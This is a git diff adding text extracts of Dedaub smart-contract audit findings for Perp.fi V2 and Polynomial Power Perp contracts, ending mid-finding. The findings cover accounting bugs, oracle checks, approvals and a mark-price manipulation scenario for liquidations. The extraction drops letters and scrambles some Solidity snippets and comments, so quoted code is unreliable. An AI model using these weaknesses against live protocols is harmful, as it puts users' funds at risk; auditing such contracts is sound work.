positions with lower tick True if needed to settle positions with upper tick Actually, needSettle0 becomes true if a OneToZero limit order should be seled, while needSettle1 if a ZeroToOne one. In the Math library, the following comment is misleading: /// @dev Compute z = max(x - y, 0) and r = x - z /// Dedaub: above is false function subUntilZero(uint256 x, uint256 y) internal pure returns (uint256 z, uint256 r) { unchecked { if (x >= y) z = x - y; else r = y - x; } } +A5 Misleading comments RESOLVED 01 In library Ticks.sol the NatSpec comments explaining a Ticks parameters needSettle0, needSettle1 refer to false limit order types: * @param needSettle0 boundary at this tick (i.e. 0 -> 1 limit orders) * @param needSettle1 boundary at this tick (i.e. 1 -> 0 limit orders) True if needed to settle positions with upper tick True if needed to settle positions with lower tick Actually, needSettle0 becomes true if a OneToZero limit order should be seled, while needSettle1 if a ZeroToOne one. In the Math library, the following comment is misleading: /// @dev Compute z = max(x - y, 0) and r = x - z /// Dedaub: above is false function subUntilZero(uint256 x, uint256 y) internal pure returns (uint256 z, uint256 r) { unchecked { if (x >= y) z = x - y; else r = y - x; } } A6 Multiple denitions of constants DISMISSED Some constants are dened in both TickMath and Constants.sol: int24 internal constant MIN_TICK = -776363; int24 internal constant MAX_TICK = 776363; uint128 internal constant MIN_SQRT_P = 65539; uint128 internal constant MAX_SQRT_P = 340271175397327323250730767849398346765; 01 A7 Magic constant RESOLVED In Pools::_addTier, Pools::setTierParameters, 100000 is a magic constant and should ideally be given a name. function _addTier( Pool storage pool, uint24 sqrtGamma, uint128 sqrtPrice ) internal returns (uint256 amount0, uint256 amount1) { uint256 tierId = pool.tiers.length; require(tierId < MAX_TIERS); require(sqrtGamma <= 100000); A8 Refactor common code? RESOLVED In Positions::update, it might be more elegant to factor out the statement self.liquidity diff --git a/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Apr '22.txt b/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Apr '22.txt new file mode 100644 index 0000000..8c7219b --- /dev/null +++ b/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Apr '22.txt @@ -0,0 +1,5 @@ +L1 Vault::receive allows any msg.sender to send Ether RESOLVED ETH deposited into the Vault contract is converted to WETH by being deposited into the WETH contract. A user wishing to withdraw their ETH needs to call the withdrawEther method, which in turn calls the withdraw method of the WETH contract. As part of the unwrapping procedure of WETH, ETH is sent back to the Vault contract, which needs to be able to receive it and thus denes the special receive() method. It is expected (mentioned in a comment) that the receive() method will only be used to receive funds sent by the WETH contract. However, there is no check enforcing this assumption, allowing practically anyone to send ETH to the contract. We believe that the current version of the code is not susceptible to any aacks that could try to manipulate the accounting of ETH performed by the Vault. Still, we cannot guarantee that no aack vectors will arise as the codebase evolves and thus suggest adding a check on the msg.sender as follows: receive() external payable { require(_msgSender() == _WETH9, "msg.sender is not WETH"); } 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. +A1 Vault allows 0 value withdrawals ACKNOWLEDGED The Vault contract allows 0 value withdrawals through its external withdraw and withdrawEther methods. We believe that adding a requirement that a withdrawals amount should be greater than 0 would improve user experience and prevent the unnecessary spending of gas on user error. [The suggestion has been acknowledged by the protocol's team and might be implemented in a future release.] +A2 Vault allows 0 value liquidations ACKNOWLEDGED The Vault contract allows 0 value liquidations through its liquidateCollateral method. Disallowing such liquidations will protect users from unnecessarily spending gas in case they make a mistake. [The suggestion has been acknowledged by the protocol's team and might be implemented in a future release.] +A3 Vault::_modifyBalance gas optimization RESOLVED Internal method Vault::_modifyBalance allows the mount parameter to be 0. This behavior is intended, as it is clearly documented in a comment. Nevertheless, when amount is 0, no changes are applied to the contract's state, as can be seen below: function _modifyBalance( address trader, address token, int256 amount ) internal { 0 // Dedaub: code has no effects on storage, still consumes some gas int256 oldBalance = _balance[trader][token]; int256 newBalance = oldBalance.add(amount); _balance[trader][token] = newBalance; if (token == _settlementToken) { return; } // register/deregister non-settlement collateral tokens if (oldBalance != 0 && newBalance == 0) { // Dedaub: execution will not reach here when amount is 0 // .. } else if (oldBalance == 0 && newBalance != 0) { // Dedaub: execution will not reach here when amount is 0 // .. } } oldBalance and newBalance are equal when amount is 0, thus no state changes get applied. Still some gas is consumed, which can be avoided if the method is changed to return early if amount is 0. +A4 Vault::_getAccountValueAndTotalCollateralValue gas optimization RESOLVED Method _getAccountValueAndTotalCollateralValue calls the AccountBalance contracts method getPnlAndPendingFee twice, once directly and once in the call to _getSettlementTokenBalanceAndUnrealizedPnl in _getTotalCollateralValue. The rst call to getPnlAndPendingFee to get the unrealized PnL could be removed if the code was restructured appropriately to reuse the same value returned by _getSettlementTokenBalanceAndUnrealizedPnl. A5 Compiler known issues INFO 0 The contracts were compiled with the Solidity compiler v0.7.6 which, at the time of writing, has a few known bugs. We inspected the bugs listed for this version and concluded that the subject code is unaected. 0 CENTRALIZATION ASPECTS As is common in many new protocols, the owner of the smart contracts yields considerable power over the protocol, including changing the contracts holding the users funds and adding tokens, which potentially means borrowing tokens using fake collateral, etc. In addition, the owner of the protocol has total control of several protocol parameters: - the collateral ratio of tokens - the discount ratio (applicable in liquidation) - the deposit cap of tokens - the maximum number of dierent collateral tokens for an account - the maintenance margin buer ratio - the allowed ratio of debt in non selement tokens - the liquidation ratio - the insurance fund fee ratio - the debt threshold - the collateral value lower (dust) limit In case the aforementioned parameters are decided by governance in future versions of the protocol, collateral ratios should be approached in a really careful and methodical way. We believe that a more decentralized approach would be to alter these weights in a specic way dened by predetermined formulas (taking into consideration the on-chain volatility and liquidity available on-chain) and allow only small adjustments by governance. 0 diff --git a/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Jan '23.txt b/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Jan '23.txt new file mode 100644 index 0000000..ee33880 --- /dev/null +++ b/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Jan '23.txt @@ -0,0 +1,6 @@ +M1 Normal protocol function depends on the timely updates of the price feeds and of the associated PriceFeedDispatcher STATUS OPEN The PriceFeedDispatcher contract, which by default uses a Chainlink price feed (contract ChainlinkPriceFeedV3), might dispatch to the internal Uniswap +V3 vAMM price feed if the underlying Chainlink price feed has timed-out, i.e., has not been successfully updated for a period of time. Thus, the Chainlink price feed and consequently the PriceFeedDispatcher contracts methods that update the current price have to be successfully called at regular time intervals not only to eectively keep track of the asset prices but also of the status of the Chainlink price feed used by the PriceFeedDispatcher to timely switch to the fallback Uniswap oracle. Lets consider the following concrete scenario for beer clarity: a Chainlink oracle that is consulted by a certain Chainlink price feed of the Perpetual protocol is not functioning properly leading to the price geing timed-out. However, the PriceFeedDispatcher using the aforementioned Chainlink price feed is not called to update or get the price during the time-out period. In that case the status of the dispatcher never changes to Uniswap and is as if the timeout never happened. 0 The current design of the Chainlink price feeds and the PriceFeedDispatcher contracts requires the owners/operators and/or users to run o-chain bots that are programmed to call the update/query methods of the aforementioned contracts at the right intervals to ensure the normal function of the protocol. However, such o-chain solutions cannot be trusted even for events that might be rare, such as a Chainlink oracle reporting the wrong price for a prolonged period of time. We believe that there should be a fallback (implemented on-chain) that ensures the normal function of the protocol even if the state of the price feeds and dispatchers is not timely updated, be it due to o-chain bot malfunction or absence of market participants (and therefore sparse contract calls/updates). M2 Chainlink deviation checks do not take time into account OPEN ChainlinkPriceFeedV3 ensures that every change in the Chainlink price is not larger by a certain fraction of the old price. However, this check only takes into account the dierence in price, and not the time that it took for this dierence to occur. function _isOutlier(uint256 price) internal view returns (bool) { uint256 diff = _lastValidPrice >= price ? _lastValidPrice - price : price - _lastValidPrice; uint256 deviationRatio = diff.mul(_ONE_HUNDRED_PERCENT_RATIO).div(_lastValidPrice); return deviationRatio >= _maxOutlierDeviationRatio; } Time is only implicitly taken into account by the frequency of updates: if they are regular then this is not an issue, however, too frequent or infrequent updates could potentially be problematic: Assuming that an adversary can control the Chainlink updates and wishes to produce a huge change without triggering the deviation check. This could be achieved by applying a change of the maximum allowed ratio but in every 0 single block. The overall dierence can be large without any individual update exceeding the limit. Inversely, assume that a token is volatile and its price is rapidly increasing. An adversary might wish to prevent the oracle from registering the increase in price; this could be achieved by preventing the update transactions from executing, using some DoS technique (e.g., DoS on the nodes sending such transactions). If the price gradually increases above the maximum ratio over a period of time, but no update happens during that period, then the next update will trigger the deviation limit, further preventing the price from updating. For the above reasons we recommend that the deviation checks take time into account. LOW SEVERITY: ID Description ClearingHouse::quitMarket is not guarded against +L1 reentrancy STATUS OPEN The function ClearingHouse::quitMarket is not guarded against reentrancy. Even though there is no such threat in the current version of the codebase, we would suggest adding reentrancy guards (as it is done for all functionality that is oered by the ClearingHouse contract) as a precaution measure, in case a reentrancy is made possible by future code changes. No StatusUpdated event emied in PriceFeedDispatcher OPEN constructor +L2 0 There is no StatusUpdated event emied in the PriceFeedDispatcher constructor even though the _chainlinkPriceFeed +V3 storage variable is set. The status storage variable is also technically set for the rst time. 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. +V3 storage variable is set. The status storage variable is also technically set for the rst time. 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. A1 PriceFeedUpdater does not allow adding/removing feeds INFO The PriceFeedUpdated contract does not support addition and removal of price feeds, meaning that the whole contract should be redeployed in case this is a need. A2 Storage variables can be made immutable INFO There exist a couple of storage variables that are set in the constructor and cannot be modied afterwards. These variables can be declared immutable: UniswapV3PriceFeed::pool PriceFeedDispatcher::_chainlinkPriceFeedV3 A3 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.7.6 which, at the time of writing, has a few known bugs. We inspected the bugs listed for this version and concluded that the subject code is unaected. 0 CENTRALIZATION ASPECTS It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have signicant centralization threats.) As already mentioned in issue M1, the normal function of the protocol depends on the timely updates of the Chainlink price feeds and of the associated PriceFeedDispatcher contracts. These updates are performed by o-chain bots, which cannot be fully trusted. 0 diff --git a/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Sep '22.txt b/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Sep '22.txt new file mode 100644 index 0000000..50128aa --- /dev/null +++ b/findings_newupdate/dedaub/Perpetual Protocol _ Perp.fi V2 Audit Report - Sep '22.txt @@ -0,0 +1,6 @@ +L1 SurplusBeneciary::setFeeDistributor does not remove the innite approval for _token given to the old fee distributor. STATUS RESOLVED SurplusBeneficiary::setFeeDistributor sets the new fee distributor contract and approves it to be able to transfer an innite amount of USDC. However, the approval of the old fee distributor is not revoked, allowing it to transfer any amount of USDC even though that contract might have been deemed obsolete or even vulnerable. 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. +A1 ERC20::transfer might get called with amount set to 0 RESOLVED SurplusBeneciary::dispatch computes the amount of USDC that should be transferred to the treasury and executes the transfer without checking rst that the transferred amount is not 0. function dispatch() external override nonReentrant { // .. uint256 tokenAmountToTreasury = FullMath.mulDiv(tokenAmount, _treasuryPercentage, 1e6); // Dedaub: tokenAmountToTreasury might be 0 due to _treasuryPercentage // being 0 or due to rounding. SafeERC20.safeTransfer(IERC20(token), _treasury, tokenAmountToTreasury); // .. } oldBalance and newBalance are equal when +A2 SurplusBeneciary::_token can be declared immutable INFO Storage variable _token of the SurplusBeneciary contract could be declared immutable, which would reduce the gas required to access it, as it is only set in the contracts constructor. +A3 set* functions should ensure new value is not equal to old RESOLVED 0 Functions setFeeDistributor and setTreasury of the SurplusBeneciary contract could implement a check that ensures the new value, which is being set, is not equal to the old one. +A4 Innite USDC approval given to the FeeDistributor contract RESOLVED When seing the FeeDistributor contract for the SurplusBeneciary, innite USDC approval is also given to it. An alternative approach would be to set the approval (in function SurplusBeneficiary::dispatch) to the amount transferred prior to every transfer happening to avoid the dangers that come with approving a contract for an innite amount. Of course, there is a tradeo; the extra approve call happening in every call of dispatch would translate in higher gas costs, which could be considered bearable as the protocol is deployed on Optimism. +A5 Whitelist debt threshold can be set to lower than the default INFO There is no check to ensure the whitelist debt threshold cannot be set to a value that would be less than the default debt threshold. This might be intentional but the term whitelist could have users expect that their debt threshold can only increase from the default. A6 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.7.6 which, at the time of writing, has a few known bugs. We inspected the bugs listed for this version and concluded that the subject code is unaected. 0 CENTRALIZATION ASPECTS As is common in many new protocols, the owner of the smart contracts yields considerable power over the protocol, including changing the contracts holding the users funds, killing contracts (FeeDistributor), using emergency unlock (vePERP)etc. In addition, the owner of the protocol has total control of several protocol parameters: - the treasury contract address - the percentage of funds going to the treasury - the fee distributor contract address - the insurance fund surplus threshold - the insurance fund surplus beneciary contract - the whitelisted debt threshold 0 diff --git a/findings_newupdate/dedaub/Polynomial _ Polynomial Power Perp Contracts Audit - Apr '23.txt b/findings_newupdate/dedaub/Polynomial _ Polynomial Power Perp Contracts Audit - Apr '23.txt new file mode 100644 index 0000000..cf9ade5 --- /dev/null +++ b/findings_newupdate/dedaub/Polynomial _ Polynomial Power Perp Contracts Audit - Apr '23.txt @@ -0,0 +1,41 @@ +H1 The validity of the index price, the funding rate and the mark price is not always checked by the calle STATUS OPEN Functions getIndexPrice, getFundingRate and getMarkPrice of the Exchange contract depend on the externally provided base asset price that could be invalid in some cases. Nevertheless, the aforementioned functions do not revert in case the base asset price is invalid but return a tuple with the derived value and a boolean that denotes the derived value is invalid due to the base asset price being invalid. The callers of the functions are responsible for checking the validity of the returned values, a design which is valid and flexible as long as it is appropriately implemented. However, the function Exchange::_updateFundingRate does not check the validity of the funding rate value returned by getFundingRate, which could lead to an invalid funding rate geing registered, messing up the protocols operation. At the same time ShortCollateral::liquidate does not check the validity of the mark price returned by Exchanges getMarkPrice. The chance that something will go wrong is signicantly smaller with liquidate because each call to it is preceded by a call to the function maxLiquidatableDebt that checks the validity of the mark price. +H2 LiquidityPool LP token price might be incorrect OPEN LiquidityPool::getTokenPrice, the function that computes the price of one LP token, might return an incorrect price under certain circumstances. Specically, it is incorrectly assumed that if the skew is equal to 0 the totalMargin and usedFunds will always add up to 0. LiquidityPool::getTokenPrice() function getTokenPrice() public view override returns (uint256) { if (totalFunds == 0) { return 1e18; } uint256 totalSupply = liquidityToken.totalSupply() + totalQueuedWithdrawals; int256 skew = _getSkew(); if (skew == 0) { // Dedaub: Incorrect assumption that if skew == 0 then // return totalFunds.divWadDown(totalSupply); totalMargin + usedFunds == 0 } (uint256 markPrice, bool isInvalid) = getMarkPrice(); require(!isInvalid); uint256 totalValue = totalFunds; uint256 amountOwed = markPrice.mulWadDown(powerPerp.totalSupply()); uint256 amountToCollect = markPrice.mulWadDown(shortToken.totalShorts()); uint256 totalMargin = _getTotalMargin(); totalValue += totalMargin + amountToCollect; totalValue -= uint256((int256(amountOwed) + usedFunds)); return totalValue.divWadDown(totalSupply); The accounting of LiquidityPools queued orders is OPEN incorrect } +H3 LiquidityPool::_placeDelayedOrder does not set the queuedPerpSize storage variable to 0 when an order of size sizeDelta + queuedPerpSize is submied to the Synthetix Perpetual Market. Also, queuedPerpSize should also be accounted for in the SubmitDelayedOrder emied event. LiquidityPool::_placeDelayedOrder() function _placeDelayedOrder( int256 sizeDelta, bool isLiquidation ) internal { PerpsV2MarketBaseTypes.DelayedOrder memory order = perpMarket.delayedOrders(address(this)); (,,,,, IPerpsV2MarketBaseTypes.Status status) = perpMarket.postTradeDetails(sizeDelta, 0, IPerpsV2MarketBaseTypes.OrderType.Delayed, address(this)); int256 oldSize = order.sizeDelta; if (oldSize != 0 || isLiquidation || uint8(status) != 0) { queuedPerpSize += sizeDelta; return; } perpMarket.submitOffchainDelayedOrderWithTracking( sizeDelta + queuedPerpSize, perpPriceImpactDelta, synthetixTrackingCode ); // Dedaub: queuedPerpSize should be set to 0 // Dedaub: Below line should be: // emit SubmitDelayedOrder(sizeDelta); emit SubmitDelayedOrder(sizeDelta + queuedPerpSize); } +H4 The mark price is susceptible to manipulation OPEN The mark price depends on the total sizes of the long and short positions. ShortCollateraltoken::canLiquidate and maxLiquidatableDebt use the mark price to compute the value of the position and to check if the collateralization ratio is above the liquidation limit or not. An adversary could open a large short position to increase the mark price and therefore decrease the collateral ratio of all the positions and possibly make some of them undercollateralized. The adversary would then proceed by calling Exchanges liquidate function to liquidate the underwater position(s) and get the liquidation bonus before nally closing their short position. +H5 Accounting of usedFunds and totalFunds is incorrect OPEN The LiquidityPool contract uses two storage variables to track its available balance, usedFunds and totalFunds. As one would expect, these two variables get updated when a position is open or closed, i.e., when functions openLong, openShort, closeLong and closeShort are called. Incoming (openLong and closeShort) and outgoing (openShort and closeLong) funds for the position must be considered together with funds needed for fees. There are 3 types of fees, trading fees aributed to the LiquidityPool, fees required to open an oseing position in the Synthetix Perp Market, which are called hedgingFees, and a protocol fee, externalFee. The accounting of all these values is rather complex and ends up being incorrect in all the four aforementioned functions. Lets take the closeLong function as an example. In closeLong there are no incoming funds and the outgoing funds are the sum of the totalCost, the externalFee and the hedgingFees. However, the usedFunds are actually increased by tradeCost or totalCost+tradingFee+externalFee+hedgingFees, while hedgingFees are also added to usedFunds in the _hedge function. Thus, there are two issues: (1) hedgingFees are accounted for twice and (2) tradingFee is added when it should not. LiquidityPool::closeLong() function closeLong(uint256 amount, address user, bytes32 referralCode) external override onlyExchange nonReentrant returns (uint256 totalCost) { } (uint256 markPrice, bool isInvalid) = getMarkPrice(); require(!isInvalid); uint256 tradeCost = amount.mulWadDown(markPrice); uint256 fees = orderFee(-int256(amount)); totalCost = tradeCost - fees; SUSD.safeTransfer(user, totalCost); uint256 hedgingFees = _hedge(-int256(amount), false); uint256 feesCollected = fees - hedgingFees; uint256 externalFee = feesCollected.mulWadDown(devFee); SUSD.safeTransfer(feeReceipient, externalFee); tradeCost = totalCost + fees fees = feesCollected + hedgingFees and feesCollected = tradingFee + externalFee // Dedaub: usedFunds is incremented by tradeCost // // // usedFunds += int256(tradeCost); emit RegisterTrade(referralCode, feesCollected, externalFee); emit CloseLong(markPrice, amount, fees); The functions openLong, openShort and closeShort suer from similar issues. H6 There might not be enough incentives for liquidators to OPEN liquidate unhealthy positions Collateralized short positions opened via the Exchange can get liquidated. For a liquidatable position of size N the liquidator has to give up N PowerPerp tokens for an amount of short collateral tokens equaling the value of the position plus a liquidation bonus. Thus, a user/liquidator is incentivized to liquidate a losing position instead of just closing their position, as they will get a liquidation bonus on top of what they would get. However, the liquidator might not always get paid an amount of short collateral tokens equaling the value of the position plus a liquidation bonus according to the following condition in function ShortCollateral::liquidate: ShortCollateral::liquidate() totalCollateralReturned = liqBonus + collateralClaim; if (totalCollateralReturned > userCollateral.amount) totalCollateralReturned = userCollateral.amount; As can be seen, if the value of the position plus the liquidation bonus, or totalCollateralReturned, is greater than the positions collateral, the liquidator gets just the positions collateral. This means that if during a signicant price increase liquidations do not happen fast enough, certain losing positions will not be liquidatable for a prot, as the collaterals value will be less than that of the long position that needs to be closed. However, such a market is not healthy and this is reflected in the mark price, which lies in the center of the protocol. To avoid such scenarios (1) the collateralization ratios need to be chosen carefully while taking into account the squared nature of the perps and (2) an emergency fund should be implemented, which will be able to chip in when a position's collateral is not enough to incentivize its liquidation. 9 MEDIUM SEVERITY: ID Description +M1 Liquidators are not able to set a minimum amount of collateral that they expect from a liquidatio STATUS OPEN Function Exchange::_liquidate does not require that totalCollateralReturned, i.e., the collateral awarded to the liquidator, is greater than a liquidator-specied minimum, thus in certain cases the liquidator might get back less than what they expected (as mentioned in issue H6). This might happen because the collateral of the position is not enough to cover the liquidations theoretical collateral claim (bad debt scenario) plus the liquidation bonus. As can be seen in the below snippet of the ShortCollaterals liquidate function, the totalCollateralReturned will be at most equal to the collateral of the specic position. ShortCollateral::liquidate() function liquidate(uint256 positionId, uint256 debt, address user) external override onlyExchange nonReentrant returns (uint256 totalCollateralReturned) // Dedaub: Code omitted for brevity uint256 collateralClaim = debt.mulDivDown(markPrice, collateralPrice); uint256 liqBonus = collateralClaim.mulWadDown(coll.liqBonus); totalCollateralReturned = liqBonus + collateralClaim; // Dedaub: This if statement can reduce totalCollateralReturned to // if (totalCollateralReturned > userCollateral.amount) totalCollateralReturned = userCollateral.amount; something smaller than expected by the liquidator { 1 userCollateral.amount -= totalCollateralReturned; // Dedaub: Code omitted for brevity } +M2 KangarooVault funds are not optimally managed OPEN Function KangarooVault::_clearPendingOpenOrders determines if the previous open order has been successfully executed or has been canceled. In case the order has been canceled, the opposite exchange order is closed and the KangarooVault position data are adjusted to how they were before opening the order. However, the margin transferred to the Synthetix Perpetual Market, which was required for the position, is not revoked, meaning that the KangarooVault funds are not optimally managed. At the same time, when a pending close orders execution is conrmed in the function _clearPendingCloseOrders, the margin deposited to the Synthetix Perpetual Market is not reduced accordingly except when positionData.shortAmount == 0. The KangarooVault funds could also be suboptimally managed because the function KangarooVault::_openPosition does not take into account the already available margin when calculating the margin needed for a new open order. If the already opened position has available margin the KangarooVault could use part of that for its new order and transfer less than what would be needed if there was no margin available. +M3 LiquidityPool and KangarooVault could be susceptible OPEN to bank runs The LiquidityPool and KangarooVault contracts could be susceptible to bank runs. As these two contracts can use up to their whole available balance, liquidity providers might rush to withdraw their deposits when they feel that they might not be able to withdraw for some time. At the same time, depositors would rush to withdraw if they 1 realized that the pools Synthetix position is in danger and their funds that have been deposited as margin could get lost. A buer of funds that are always available for withdrawal could increase the trust of liquidity providers to the system. Also, an emergency fund, which is built from fees and could help alleviate fund losses, could also help make the system more robust against bank run scenarios. +M4 Casual users might be more vulnerable in a bank run OPEN In a bank run situation casual users of the LiquidityPool (i.e., users that interact with it through the web UI) might not be able to withdraw their funds. This is because the LiquidityPool oers dierent withdrawal functionality for dierent users. Power users (or protocols that integrate with the LiquidityPool) are expected to use the withdraw function, which oers immediate withdrawals for a small fee, while casual users that use the web UI will use the queueWithdraw function, which queues the withdrawal so it can be processed at a later time. +M5 Unsafe ER +C20 transfer in LiquidityPool::withdraw OPEN Function LiquidityPool::withdraw uses a plain ERC20 transfer without checking the returned value, which is an unsafe practice. It is recommended to always either use OpenZeppelin's SafeERC20 library or at least to wrap each operation in a require statement. +M6 Wrong withdrawal calculations in KangarooVault OPEN Function processWithdrawalQueue processes the KangarooVaults queued withdrawals. It rst checks if the available funds are suicient to cover the withdrawal. If not, a partial withdrawal is made and the records are updated to reflect that. The QueuedWithdraw.returnedAmount eld holds the value that has been returned to the 1 user thus far. However, it doesn't correctly account for partial withdrawals as the partial amount is being assigned to instead of being added to the variable. KangarooVault::processWithdrawalQueue() function processWithdrawalQueue( uint256 idCount ) external nonReentrant { for (uint256 i = 0; i < idCount; i++) { // Dedaub: Code omitted for brevity // Partial withdrawals if not enough available funds in the vault // Queue head is not increased if (susdToReturn > availableFunds) { // Dedaub: The withdrawn amounts should be accumulated in // current.returnedAmount = availableFunds; ... returnedAmount instead of being directly assigned } else { // Dedaub: Although this branch is for full withdrawals, there // // current.returnedAmount = susdToReturn; ... may have been partial withdrawals before, so the accounting should also be cumulative here } queuedWithdrawalHead++; } } +M7 LiquidityPools exposure calculation may be inaccurate OPEN The Synthetix Perpetual Market has a two-step process for increasing/decreasing positions in which a request is submied and remains in a pending state until it is executed by a keeper. 1 LiquidityPool::_getExposure does not consider the queued Synthetix Perp position tracked by the queuedPerpSize storage variable meaning that LiquidityPool::getExposure will return an inaccurate value when called between the submission and the execution of an order. LiquidityPool::_getExposure() function _getExposure() internal view returns (int256 exposure) { // Dedaub: queuedPerpSize should be considered in currentPosition int256 currentPosition = _getTotalPerpPosition(); exposure = _calculateExposure(currentPosition); } LiquidityPool::rebalanceMargin does not consider queuedPerpSize too. The Polynomial team has mentioned that they plan to always call placeQueuedOrder before calling rebalanceMargin, thus adding a requirement that queuedPerpSize is equal to 0 would be enough to enforce that prerequisite. M8 LiquidityPool::_hedge always adds margin to OPEN Synthetix The function LiquidityPool::_hedge is responsible for hedging every position opened against the LiquidityPool by opening the opposite position in the Synthetix Perp Market. In doing so, _hedge transfers an amount of funds to the Synthetix Perp Market to be used as margin for the position. However, margin does not need to be increased always, e.g., it does not need to be increased when the Synthetix Perp position is decreased because the LiquidityPool is hedging a long Position and thus goes short. When the absolute position size of the LiquidityPool in the Synthetix Perp Market is decreased, the LiquidityPool could remove the unnecessary margin or abstain from increasing it to account for the rare case where a Synthetix order is not executed. This together with frequent calls to the rebalanceMargin function would help improve the capital eiciency of the LiquidityPool. 14 LOW SEVERITY: ID Description +L1 Computations that use invalid values could be avoide STATUS OPEN Functions getIndexPrice, getFundingRate and getMarkPrice of the Exchange contract depend on the externally provided base asset price that could be invalid in some cases. Even if the base asset price provided is invalid, a tuple (value, true) is returned where value is the value computed based on the invalid base asset price. However, if the base asset price is invalid, the tuple (0, true) could be returned while the whole computation is skipped to save gas unnecessarily spent on computing an invalid value. +L2 A critical requirement is enforced by dependency code OPEN Function Exchange::_openTrade, when called with params.isLong set to false and params.positionId dierent from 0, does not check that the msg.sender is the owner of the params.positionId short token position. This necessary requirement is later checked when ShortToken::adjustPosition is called. Nevertheless, we would recommend adding the appropriate require statement also as part of the function _openTrade as it is the one querying the position. This would also add an extra safeguard against a future code change that accidentally removes the already existing require statement. +L3 A critical requirement is enforced by the ER +C20 code OPEN In function LiquidityPool::closeLong, as in openShort, there is an outgoing flow of funds. However, there does not exist a require statement on the existence of the needed funds as in the openShort function. Of course, if there are not enough funds to be transferred out of the LiquidityPool contract the ERC20 transfer code will cause a revert. Still, requiring that usedFunds<=0 || totalFunds>=uint256(usedFunds) 1 makes the code more failproof. The same could be applied on function rebalanceMargin where there is an outgoing flow of funds towards the Synthetix Perp Market. +L4 A critical requirement is enforced by callee code OPEN Function ShortCollateral::collectCollateral does not require that the provided collateral is approved (and matches the collateral of the already opened position). This could be problematic, i.e., a non-approved worthless collateral could be deposited instead, if every call to collectCollateral was not coupled with a call to getMinCollateral which enforces the aforementioned requirement. Implementing these requirements would constitute a step towards a more defensive approach, one that would make the system more bulletproof and robust even if the codebase continues to evolve and become more complicated. +L5 Collateral approvals cannot be revoked OPEN The ShortCollateral contract does not implement any functionality to revoke collateral approvals, meaning that the contract owner cannot undo even an incorrect approval and would need to redeploy the contract if that were to happen. Implementing such functionality would require a lot of care to ensure no funds (collateral) are trapped in the system, i.e., cannot be withdrawn, due to the collateral approval being revoked and the withdrawal functionality being operational only for approved collaterals. +L6 No events are emied for several interactions OPEN In LiquidityPool::processWithdrawals there is no event emied when a withdrawal is aempted but there are 0 funds available to be withdrawn. In LiquidityPool::setFeeReceipient there is no event emied even though a relevant event is declared in the contract (event UpdateFeeReceipient) 1 In LiquidityPool::executePerpOrders there is no event emied when the admin executes an order In KangarooVault::executePerpOrders there is no event emied when the admin executes an order In KangarooVault::receive there is no event emied when the contract receives ETH in contrast to the LiquidityPool that emits an event for this +L7 Lack of minimum deposit and withdraw amount checks allow users to spam the queues with small requests OPEN In LiquidityPool, users can request to deposit or withdraw any amount of tokens by calling the queueDeposit and queueWithdraw functions. Although there are checks in place to avoid registering zero-amount requests, there are no checks to ensure that someone cannot spam the queue with requests for innitesimal amounts. LiquidityPool::queueDeposit() function queueDeposit(uint256 amount, address user) external override nonReentrant whenNotPaused("POOL_QUEUE_DEPOSIT") { } require(amount > 0, "Amount must be greater than 0"); // Dedaub: Add a minDepositAmount check QueuedDeposit storage newDeposit = depositQueue[nextQueuedDepositId]; ... LiquidityPool::queueWithdraw() function queueWithdraw(uint256 tokens, address user) external 1 override nonReentrant whenNotPaused("POOL_QUEUE_WITHDRAW") { } require(liquidityToken.balanceOf(msg.sender) >= tokens && tokens > 0); // Dedaub: Add a minWithdrawAmount check ... QueuedWithdraw storage newWithdraw = withdrawalQueue[nextQueuedWithdrawalId]; ... Even though there is no clear nancial incentive for someone to do this, an incentive would be to disrupt the normal flow of the protocol, and to annoy regular users, who would have to spend more gas until their requests were processed. However, the functions that process the queues can be called by anyone, including the admin, and users can also bypass the queues by directly depositing or withdrawing their tokens for a fee. KangarooVault suers from the same issue for withdrawals. For deposits, a minDepositAmount variable is dened and checked each time a new deposit call is made. KangarooVault::initiateDeposit() function initiateDeposit( address user, uint256 amount ) external nonReentrant { require(user != address(0x0)); require(amount >= minDepositAmount); ... } 1 KangarooVault::initiateWithdrawal() function initiateWithdrawal( address user, uint256 tokens ) external nonReentrant { require(user != address(0x0)); if (positionData.positionId == 0) { ... } else { require(tokens > 0, "Tokens must be greater than 0"); // Dedaub: Add a minWithdrawAmount check here QueuedWithdraw storage newWithdraw = withdrawalQueue[nextQueuedWithdrawalId]; ... } VAULT_TOKEN.burn(msg.sender, tokens); } +L8 LiquidityPools deposit and withdraw arguments are not OPEN validated LiquidityPools deposit and withdraw functions do not require that the specied user, which will receive the tokens, is dierent from address(0). The caller of the aforementioned functions might not set the parameter correctly or make the incorrect assumption that by seing it to address(0) it will default to msg.sender, leading to the tokens being sent to the wrong address. At the same time, the deposited/withdrawn amount is not required to be greater than 0. +L9 VaultToken::setVault can be front-run OPEN The VaultToken contract declares the setVault function to solve the dual dependency problem between VaultToken and KangarooVault, as both require each 1 other's address for their initialisation. However, this function can be called by anyone, whereas the vault address can only be set once. As a result, we raise a warning here to emphasize that the VaultToken contract needs to be correctly initialized, as otherwise the call could be front-run or repeated (in case the initialization performed by the protocol team fails for some reason and the uninitialized variable remains unnoticed) to initialize the vault storage variable with a malicious Vault address. L10 LiquidityPool::closeShort should use mulWadUp too OPEN The closeShort function of the LiquidityPool contract has the same logic as 